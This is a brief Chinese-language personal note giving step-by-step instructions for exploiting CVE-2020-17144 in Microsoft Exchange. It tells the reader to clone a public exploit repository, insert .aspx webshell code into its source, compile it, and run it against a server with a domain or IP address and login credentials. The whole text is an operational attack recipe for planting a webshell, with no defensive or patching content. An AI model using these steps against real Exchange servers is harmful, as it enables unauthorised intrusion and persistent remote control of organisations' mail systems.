【笔记】CVE-2020-17144漏洞利用
前言
利用Airboi/CVE-2020-17144-EXP实现Exchange文件写入漏洞利用
下载项目
1 | git clone https://github.com/Airboi/CVE-2020-17144-EXP.git |
修改文件
- 修改14行,将
this is a webshell替换为WebShell
<str>:.aspx格式的WebShell代码
1 | string data = "<str>"; |
编译项目
- 通过VisualStudio编译项目为可执行文件
CVE-2020-17144.exe
漏洞利用
<domain_or_ip>:Exchange服务端域名或IP地址<username>:Exchange登录用户名<password>:Exchange登录密码
1 | .\CVE-2020-17144.exe <domain_or_ip> <username> <password> |